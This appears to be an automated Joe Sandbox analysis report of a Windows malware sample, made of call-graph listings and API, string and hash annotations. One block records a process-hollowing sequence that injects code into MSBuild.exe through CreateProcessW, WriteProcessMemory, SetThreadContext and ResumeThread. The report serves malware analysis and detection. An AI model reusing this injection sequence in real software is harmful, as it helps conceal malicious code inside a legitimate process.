6e1ea3 11841->11843 11847 6e5cf9 11842->11847 11850 6e5c88 11843->11850 11846 6e1e83 11846->11769 11848 6e5c88 32 API calls 11847->11848 11849 6e5d0b 11848->11849 11849->11846 11853 6e5eeb 11850->11853 11854 6e5ef7 ___scrt_is_nonwritable_in_current_image 11853->11854 11861 6e720f EnterCriticalSection 11854->11861 11856 6e5f05 11862 6e5d0f 11856->11862 11858 6e5f12 11872 6e5f3a 11858->11872 11861->11856 11863 6e5d2a 11862->11863 11871 6e5d9d _unexpected 11862->11871 11864 6e5d7d 11863->11864 11866 6ebba2 32 API calls 11863->11866 11863->11871 11865 6ebba2 32 API calls 11864->11865 11864->11871 11867 6e5d93 11865->11867 11868 6e5d73 11866->11868 11869 6e8352 __freea 14 API calls 11867->11869 11870 6e8352 __freea 14 API calls 11868->11870 11869->11871 11870->11864 11871->11858 11875 6e7226 LeaveCriticalSection 11872->11875 11874 6e5cb9 11874->11846 11875->11874 11877 6eb4b8 11876->11877 11878 6eb4a7 GetLastError 11876->11878 11880 6eac74 39 API calls 11877->11880 11879 6e8b2b __dosmaperr 14 API calls 11878->11879 11883 6eb4b3 11879->11883 11881 6eb4e9 11880->11881 11924 6eb554 11881->11924 11884 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 11883->11884 11885 6e59a0 11884->11885 11886 6e5a8c 11885->11886 11888 6e5ab2 11886->11888 11890 6e5b10 11888->11890 11952 6eb616 11888->11952 11889 6e59d3 11892 6e5900 11889->11892 11890->11889 11891 6eb616 39 API calls 11890->11891 11891->11890 11893 6e5943 11892->11893 11894 6e5911 11892->11894 11893->11810 11893->11811 11894->11893 11895 6e8bb5 _unexpected 14 API calls 11894->11895 11896 6e593a 11895->11896 11897 6e8352 __freea 14 API calls 11896->11897 11897->11893 11899 6ead65 11898->11899 11900 6ead8b _strpbrk 11899->11900 11901 6ead75 11899->11901 11905 6eadf6 11900->11905 11914 6eae0a 11900->11914 11958 6eb12a 11900->11958 12010 6eb1db 11900->12010 11902 6e8b05 __dosmaperr 14 API calls 11901->11902 11903 6ead7a 11902->11903 11904 6e62b9 __strnicoll 29 API calls 11903->11904 11906 6e5a3e 11904->11906 11907 6e5900 14 API calls 11905->11907 11906->11821 11906->11822 11908 6eae39 11907->11908 11911 6eae42 11908->11911 11918 6eae58 11908->11918 11913 6e8352 __freea 14 API calls 11911->11913 11912 6eaeb8 11915 6e8352 __freea 14 API calls 11912->11915 11913->11914 12046 6eb07e 11914->12046 11917 6eaec5 11915->11917 11919 6eb07e 14 API calls 11917->11919 11918->11912 11921 6eaed5 11918->11921 12052 6f0e8e 11918->12052 11919->11906 11922 6e62e6 __strnicoll 11 API calls 11921->11922 11923 6eaee1 11922->11923 11925 6eb570 11924->11925 11926 6eb561 11924->11926 11927 6eb59d 11925->11927 11928 6eb578 11925->11928 11926->11883 11929 6ebc8c ___scrt_uninitialize_crt WideCharToMultiByte 11927->11929 11928->11926 11945 6eb519 11928->11945 11930 6eb5ad 11929->11930 11932 6eb5ca 11930->11932 11933 6eb5b4 GetLastError 11930->11933 11935 6eb5db 11932->11935 11937 6eb519 14 API calls 11932->11937 11934 6e8b2b __dosmaperr 14 API calls 11933->11934 11936 6eb5c0 11934->11936 11935->11926 11949 6eaf94 11935->11949 11939 6e8b05 __dosmaperr 14 API calls 11936->11939 11937->11935 11939->11926 11941 6eb5f5 GetLastError 11942 6e8b2b __dosmaperr 14 API calls 11941->11942 11943 6eb601 11942->11943 11944 6e8b05 __dosmaperr 14 API calls 11943->11944 11944->11926 11946 6eb524 11945->11946 11947 6e8b05 __dosmaperr 14 API calls 11946->11947 11948 6eb52d 11947->11948 11948->11926 11950 6ebc8c ___scrt_uninitialize_crt WideCharToMultiByte 11949->11950 11951 6eafb1 11950->11951 11951->11926 11951->11941 11955 6eb62e 11952->11955 11956 6e7b4f __strnicoll 39 API calls 11955->11956 11957 6eb629 11956->11957 11957->11888 11959 6eb136 11958->11959 11959->11959 11960 6eb14f 11959->11960 11961 6e8bb5 _unexpected 14 API calls 11959->11961 11960->11900 11962 6eb164 11961->11962 11963 6eb177 11962->11963 11964 6f0e8e 29 API calls 11962->11964 11965 6f0e8e 29 API calls 11963->11965 11967 6eb1ce 11963->11967 11964->11963 11966 6eb190 11965->11966 11966->11967 11968 6eb197 11966->11968 11970 6e62e6 __strnicoll 11 API calls 11967->11970 12061 6eb0a3 11968->12061 11975 6eb1da 11970->11975 11972 6eb1b0 11977 6e8352 __freea 14 API calls 11972->11977 11973 6e8352 __freea 14 API calls 11973->11972 11974 6eb222 11976 6eb24e 11974->11976 11978 6eb23b 11974->11978 11975->11974 12072 6f0f90 11975->12072 11980 6eac74 39 API calls 11976->11980 11977->11960 11979 6eb12a 47 API calls 11978->11979 11993 6eb246 11979->11993 11982 6eb2a2 11980->11982 11983 6ead0c 17 API calls 11982->11983 11985 6eb2b0 FindFirstFileExW 11983->11985 11984 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 11986 6eb45e 11984->11986 11987 6eb2d8 11985->11987 12000 6eb306 11985->12000 11986->11900 11988 6eb12a 47 API calls 11987->11988 11989 6eb2e6 11988->11989 11992 6e8352 __freea 14 API calls 11989->11992 11989->11993 11990 6eac74 39 API calls 11990->12000 11992->11993 11993->11984 11994 6eb12a 47 API calls 11994->12000 11995 6eb3b7 FindNextFileW 11998 6eb3cd 11995->11998 11995->12000 11996 6eb41c 11999 6eb430 FindClose 11996->11999 12004 6e8352 __freea 14 API calls 11996->12004 11997 6e8352 __freea 14 API calls 11997->12000 12001 6eb3fd FindClose 11998->12001 12098 6f09a0 11998->12098 11999->11993 12005 6eb43f 11999->12005 12000->11990 12000->11994 12000->11995 12000->11996 12000->11997 12075 6eafb8 12000->12075 12001->11993 12003 6eb40c 12001->12003 12007 6e8352 __freea 14 API calls 12003->12007 12008 6eb42f 12004->12008 12009 6e8352 __freea 14 API calls 12005->12009 12007->11993 12008->11999 12009->11993 12011 6eb222 12010->12011 12014 6eb205 12010->12014 12012 6eb24e 12011->12012 12013 6eb23b 12011->12013 12016 6eac74 39 API calls 12012->12016 12015 6eb12a 51 API calls 12013->12015 12014->12011 12017 6f0f90 39 API calls 12014->12017 12045 6eb246 12015->12045 12018 6eb2a2 12016->12018 12017->12014 12019 6ead0c 17 API calls 12018->12019 12021 6eb2b0 FindFirstFileExW 12019->12021 12020 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12022 6eb45e 12020->12022 12023 6eb2d8 12021->12023 12035 6eb306 12021->12035 12022->11900 12024 6eb12a 51 API calls 12023->12024 12025 6eb2e6 12024->12025 12028 6e8352 __freea 14 API calls 12025->12028 12025->12045 12026 6eac74 39 API calls 12026->12035 12027 6eafb8 18 API calls 12027->12035 12028->12045 12029 6eb12a 51 API calls 12029->12035 12030 6eb3b7 FindNextFileW 12033 6eb3cd 12030->12033 12030->12035 12031 6eb41c 12034 6eb430 FindClose 12031->12034 12039 6e8352 __freea 14 API calls 12031->12039 12032 6e8352 __freea 14 API calls 12032->12035 12036 6eb3fd FindClose 12033->12036 12037 6f09a0 29 API calls 12033->12037 12040 6eb43f 12034->12040 12034->12045 12035->12026 12035->12027 12035->12029 12035->12030 12035->12031 12035->12032 12038 6eb40c 12036->12038 12036->12045 12041 6eb3fa 12037->12041 12042 6e8352 __freea 14 API calls 12038->12042 12043 6eb42f 12039->12043 12044 6e8352 __freea 14 API calls 12040->12044 12041->12036 12042->12045 12043->12034 12044->12045 12045->12020 12050 6eb088 12046->12050 12047 6eb098 12049 6e8352 __freea 14 API calls 12047->12049 12048 6e8352 __freea 14 API calls 12048->12050 12051 6eb09f 12049->12051 12050->12047 12050->12048 12051->11906 12054 6f0e99 12052->12054 12053 6f0eb3 12055 6f0ec7 12053->12055 12056 6e8b05 __dosmaperr 14 API calls 12053->12056 12054->12053 12054->12055 12059 6f0eec 12054->12059 12055->11918 12057 6f0ebd 12056->12057 12058 6e62b9 __strnicoll 29 API calls 12057->12058 12058->12055 12059->12055 12060 6e8b05 __dosmaperr 14 API calls 12059->12060 12060->12057 12062 6eb0b5 12061->12062 12065 6eb0b1 12061->12065 12063 6eb0ba 12062->12063 12064 6eb0e0 12062->12064 12066 6e8bb5 _unexpected 14 API calls 12063->12066 12064->12065 12067 6ebba2 32 API calls 12064->12067 12065->11972 12065->11973 12068 6eb0c3 12066->12068 12070 6eb100 12067->12070 12069 6e8352 __freea 14 API calls 12068->12069 12069->12065 12071 6e8352 __freea 14 API calls 12070->12071 12071->12065 12106 6f0fa7 12072->12106 12074 6f0fa2 12074->11975 12076 6eafc6 12075->12076 12077 6eafe2 12075->12077 12078 6eacf2 14 API calls 12076->12078 12079 6eafe9 12077->12079 12080 6eb005 12077->12080 12094 6eafd0 12078->12094 12079->12094 12120 6ead29 12079->12120 12081 6ebc8c ___scrt_uninitialize_crt WideCharToMultiByte 12080->12081 12083 6eb015 12081->12083 12084 6eb01c GetLastError 12083->12084 12085 6eb032 12083->12085 12086 6e8b2b __dosmaperr 14 API calls 12084->12086 12087 6eb043 12085->12087 12090 6ead29 15 API calls 12085->12090 12089 6eb028 12086->12089 12088 6eaf94 WideCharToMultiByte 12087->12088 12087->12094 12091 6eb059 12088->12091 12092 6e8b05 __dosmaperr 14 API calls 12089->12092 12090->12087 12093 6eb05d GetLastError 12091->12093 12091->12094 12092->12094 12095 6e8b2b __dosmaperr 14 API calls 12093->12095 12094->12000 12096 6eb069 12095->12096 12097 6e8b05 __dosmaperr 14 API calls 12096->12097 12097->12094 12099 6f09da 12098->12099 12100 6e8b05 __dosmaperr 14 API calls 12099->12100 12105 6f09ee 12099->12105 12101 6f09e3 12100->12101 12102 6e62b9 __strnicoll 29 API calls 12101->12102 12102->12105 12103 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 12104 6eb3fa 12103->12104 12104->12001 12105->12103 12107 6f0fc9 12106->12107 12108 6f0fb5 12106->12108 12110 6f0fe3 12107->12110 12111 6f0fd1 12107->12111 12109 6e8b05 __dosmaperr 14 API calls 12108->12109 12112 6f0fba 12109->12112 12116 6e7b4f __strnicoll 39 API calls 12110->12116 12119 6f0fe1 12110->12119 12113 6e8b05 __dosmaperr 14 API calls 12111->12113 12114 6e62b9 __strnicoll 29 API calls 12112->12114 12115 6f0fd6 12113->12115 12117 6f0fc5 12114->12117 12118 6e62b9 __strnicoll 29 API calls 12115->12118 12116->12119 12117->12074 12118->12119 12119->12074 12121 6eacf2 14 API calls 12120->12121 12122 6ead37 12121->12122 12123 6eac55 15 API calls 12122->12123 12124 6ead45 12123->12124 12124->12094 12126 6e5c1e 12125->12126 12130 6e5c3e 12125->12130 12127 6e8b05 __dosmaperr 14 API calls 12126->12127 12128 6e5c34 12127->12128 12129 6e62b9 __strnicoll 29 API calls 12128->12129 12129->12130 12130->11831 11233 6e670d 11234 6e8352 __freea 14 API calls 11233->11234 11235 6e6725 11234->11235 12352 6e7881 12353 6e788d ___scrt_is_nonwritable_in_current_image 12352->12353 12364 6e720f EnterCriticalSection 12353->12364 12355 6e7894 12365 6ec394 12355->12365 12358 6e78b2 12384 6e78d8 12358->12384 12363 6e79c3 2 API calls 12363->12358 12364->12355 12366 6ec3a0 ___scrt_is_nonwritable_in_current_image 12365->12366 12367 6ec3ca 12366->12367 12368 6ec3a9 12366->12368 12387 6e720f EnterCriticalSection 12367->12387 12369 6e8b05 __dosmaperr 14 API calls 12368->12369 12371 6ec3ae 12369->12371 12372 6e62b9 __strnicoll 29 API calls 12371->12372 12375 6e78a3 12372->12375 12375->12358 12378 6e790d GetStartupInfoW 12375->12378 12376 6ec3d6 12377 6ec402 12376->12377 12388 6ec2e4 12376->12388 12395 6ec429 12377->12395 12379 6e792a 12378->12379 12380 6e78ad 12378->12380 12379->12380 12381 6ec394 30 API calls 12379->12381 12380->12363 12382 6e7952 12381->12382 12382->12380 12383 6e7982 GetFileType 12382->12383 12383->12382 12399 6e7226 LeaveCriticalSection 12384->12399 12386 6e78c3 12387->12376 12389 6e8bb5 _unexpected 14 API calls 12388->12389 12391 6ec2f6 12389->12391 12390 6ec303 12392 6e8352 __freea 14 API calls 12390->12392 12391->12390 12393 6e6ecc 6 API calls 12391->12393 12394 6ec358 12392->12394 12393->12391 12394->12376 12398 6e7226 LeaveCriticalSection 12395->12398 12397 6ec430 12397->12375 12398->12397 12399->12386 9746 6fc19e 9747 6fc1d4 9746->9747 9748 6fc321 GetPEB 9747->9748 9749 6fc333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 9747->9749 9752 6fc3ca TerminateProcess 9747->9752 9748->9749 9749->9747 9750 6fc3da WriteProcessMemory 9749->9750 9751 6fc41f 9750->9751 9753 6fc424 WriteProcessMemory 9751->9753 9754 6fc461 WriteProcessMemory Wow64SetThreadContext ResumeThread 9751->9754 9752->9747 9753->9751

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,006FC110,006FC100), ref: 006FC334
                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 006FC347
                                                                                                                                      • Wow64GetThreadContext.KERNEL32(00000094,00000000), ref: 006FC365
                                                                                                                                      • ReadProcessMemory.KERNELBASE(0000008C,?,006FC154,00000004,00000000), ref: 006FC389
                                                                                                                                      • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 006FC3B4
                                                                                                                                      • TerminateProcess.KERNELBASE(0000008C,00000000), ref: 006FC3D3
                                                                                                                                      • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 006FC40C
                                                                                                                                      • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 006FC457
                                                                                                                                      • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 006FC495
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(00000094,00D50000), ref: 006FC4D1
                                                                                                                                      • ResumeThread.KERNELBASE(00000094), ref: 006FC4E0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                      • API String ID: 2440066154-3857624555
                                                                                                                                      • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                      • Instruction ID: dceb566da3ee047f716fe3e5a1d84caf9070ee680a991b3c288da0aee5133186
                                                                                                                                      • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                      • Instruction Fuzzy Hash: 4BB1FA7664064AAFDB60CF68CD80BEA73A5FF88724F158114EA0CAB341D774FA51CB94

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNELBASE ref: 006E1622
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 006E1632
                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 006E1658
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 006E1667
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 006E17B2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseHandle$CreateReadSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3664964396-0
                                                                                                                                      • Opcode ID: c4aad3c57133c5bf9d8f741eb4b7a44032ed786926a6698d65914f15bebaa8cf
                                                                                                                                      • Instruction ID: 05deed83852b95202f660d731efbf244c907aba13d306da49df45b20d0322fd7
                                                                                                                                      • Opcode Fuzzy Hash: c4aad3c57133c5bf9d8f741eb4b7a44032ed786926a6698d65914f15bebaa8cf
                                                                                                                                      • Instruction Fuzzy Hash: 2B51F0B19053849BDB00AF26CC84A2EB7E6FF8A714F144A2DF4899B352E734D984D752

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 164 6e123b-6e1261 165 6e1263-6e127d 164->165 165->165 166 6e127f-6e1281 165->166 167 6e1283-6e12ae 166->167 167->167 168 6e12b0-6e12b9 167->168 169 6e12bf-6e12d5 168->169 170 6e1499-6e14b1 call 6e19a4 168->170 172 6e12dc-6e12e2 169->172 173 6e12e4-6e12f0 172->173 174 6e12f5-6e1322 172->174 176 6e13b7-6e13d4 KiUserExceptionDispatcher CloseFigure 173->176 177 6e1328-6e132e 174->177 178 6e14b2 call 6e182d 174->178 181 6e13fa-6e1466 176->181 182 6e13d6-6e13da 176->182 179 6e1349-6e134b 177->179 180 6e1330-6e133f 177->180 189 6e14b7 call 6e62c9 178->189 186 6e135a-6e1370 call 6e2c40 179->186 184 6e134d-6e134e call 6e1930 180->184 185 6e1341-6e1347 call 6e1807 180->185 181->172 190 6e146c-6e1471 181->190 187 6e13dc-6e13e1 182->187 188 6e13e3-6e13e8 182->188 201 6e1353-6e1358 184->201 185->201 207 6e1372-6e1378 186->207 208 6e13a0-6e13b0 186->208 187->188 194 6e13ec-6e13f2 call 6e14bc 187->194 188->182 195 6e13ea 188->195 190->170 191 6e1473-6e147b 190->191 198 6e148f-6e1491 call 6e1965 191->198 199 6e147d-6e1488 191->199 206 6e13f7 194->206 195->181 209 6e1496 198->209 199->189 204 6e148a-6e148d 199->204 201->186 204->198 206->181 210 6e137a-6e1388 207->210 211 6e1393 207->211 208->176 209->170 210->189 212 6e138e-6e1391 210->212 213 6e1396-6e1398 call 6e1965 211->213 212->213 215 6e139d 213->215 215->208
                                                                                                                                      APIs
                                                                                                                                      • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 006E13BC
                                                                                                                                      • CloseFigure.GDI32(00000000), ref: 006E13C3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseDispatcherExceptionFigureUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4068610447-0
                                                                                                                                      • Opcode ID: f2fa2999b74d1efb437fa984c2849caa5ad94fd6af46863d9b3e24483b5f9362
                                                                                                                                      • Instruction ID: 204ffdf0d4caacaeaf0699a9098e4e887fe3a2c83692bf311fac4ceadcaed4f8
                                                                                                                                      • Opcode Fuzzy Hash: f2fa2999b74d1efb437fa984c2849caa5ad94fd6af46863d9b3e24483b5f9362
                                                                                                                                      • Instruction Fuzzy Hash: B461387160A3848FC718AF3AD8946FFBBD69FD6704F14493CE5DA8B341D63099019792

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 25 6e6fe5-6e6ff1 26 6e7083-6e7086 25->26 27 6e708c 26->27 28 6e6ff6-6e7007 26->28 29 6e708e-6e7092 27->29 30 6e7009-6e700c 28->30 31 6e7014-6e702d LoadLibraryExW 28->31 32 6e70ac-6e70ae 30->32 33 6e7012 30->33 34 6e702f-6e7038 GetLastError 31->34 35 6e7093-6e70a3 31->35 32->29 39 6e7080 33->39 36 6e703a-6e704c call 6ea693 34->36 37 6e7071-6e707e 34->37 35->32 38 6e70a5-6e70a6 FreeLibrary 35->38 36->37 42 6e704e-6e7060 call 6ea693 36->42 37->39 38->32 39->26 42->37 45 6e7062-6e706f LoadLibraryExW 42->45 45->35 45->37
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,006E70F4,006E1807,?,00000000,006E1A21,006E1809,?,006E6EA6,00000022,FlsSetValue,006F5878,006F5880,006E1A21), ref: 006E70A6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                      • Opcode ID: 550867dee31a101d307e2d98509f5a01f8bf35ae33a84db586f2addfae1c315b
                                                                                                                                      • Instruction ID: 3456370ccfff0ded8c5fdfa410db4592bf0f190ff53eb751d3ec18bf967c42ae
                                                                                                                                      • Opcode Fuzzy Hash: 550867dee31a101d307e2d98509f5a01f8bf35ae33a84db586f2addfae1c315b
                                                                                                                                      • Instruction Fuzzy Hash: 112127B5A06350ABC7219B66DC80AAA776B9F813A0F250125FD05A73D0D630FD01C6D1

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32(006E5456,?,006E560B,00000000,?,?,006E5456,8A2E6549,?,006E5456), ref: 006E555A
                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,006E560B,00000000,?,?,006E5456,8A2E6549,?,006E5456), ref: 006E5561
                                                                                                                                      • ExitProcess.KERNEL32 ref: 006E5573
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                      • Opcode ID: 55431e57b5bf1a995f2393abbdb42016135f47db61cd8f8db31ec0b8ad9744fc
                                                                                                                                      • Instruction ID: 89982ac4700c8dec03962c7f43d625d532dbbe46a3946c7d840e22f2eb8204dc
                                                                                                                                      • Opcode Fuzzy Hash: 55431e57b5bf1a995f2393abbdb42016135f47db61cd8f8db31ec0b8ad9744fc
                                                                                                                                      • Instruction Fuzzy Hash: 2DD05E71010B84AFCF412FA1EC0D8AC3F27AF40355B048018B91E46031DF319991DA41

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 107 6ecb55-6ecb77 108 6ecb7d-6ecb7f 107->108 109 6ecd6a 107->109 110 6ecbab-6ecbce 108->110 111 6ecb81-6ecba0 call 6e6462 108->111 112 6ecd6c-6ecd70 109->112 114 6ecbd4-6ecbda 110->114 115 6ecbd0-6ecbd2 110->115 120 6ecba3-6ecba6 111->120 114->111 117 6ecbdc-6ecbed 114->117 115->114 115->117 118 6ecbef-6ecbfd call 6f1550 117->118 119 6ecc00-6ecc10 call 6ece82 117->119 118->119 125 6ecc59-6ecc6b 119->125 126 6ecc12-6ecc18 119->126 120->112 127 6ecc6d-6ecc73 125->127 128 6eccc2-6ecce2 WriteFile 125->128 129 6ecc1a-6ecc1d 126->129 130 6ecc41-6ecc57 call 6eceff 126->130 131 6eccae-6eccbb call 6ed32e 127->131 132 6ecc75-6ecc78 127->132 135 6ecced 128->135 136 6ecce4-6eccea GetLastError 128->136 133 6ecc1f-6ecc22 129->133 134 6ecc28-6ecc37 call 6ed2c6 129->134 145 6ecc3a-6ecc3c 130->145 152 6eccc0 131->152 139 6ecc9a-6eccac call 6ed4f2 132->139 140 6ecc7a-6ecc7d 132->140 133->134 141 6ecd02-6ecd05 133->141 134->145 138 6eccf0-6eccfb 135->138 136->135 146 6eccfd-6ecd00 138->146 147 6ecd65-6ecd68 138->147 157 6ecc95-6ecc98 139->157 148 6ecd08-6ecd0a 140->148 149 6ecc83-6ecc90 call 6ed409 140->149 141->148 145->138 146->141 147->112 153 6ecd0c-6ecd11 148->153 154 6ecd38-6ecd44 148->154 149->157 152->157 158 6ecd2a-6ecd33 call 6e8b91 153->158 159 6ecd13-6ecd25 153->159 160 6ecd4e-6ecd60 154->160 161 6ecd46-6ecd4c 154->161 157->145 158->120 159->120 160->120 161->109 161->160
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 006ECEFF: GetConsoleOutputCP.KERNEL32(8A2E6549,00000000,00000000,?), ref: 006ECF62
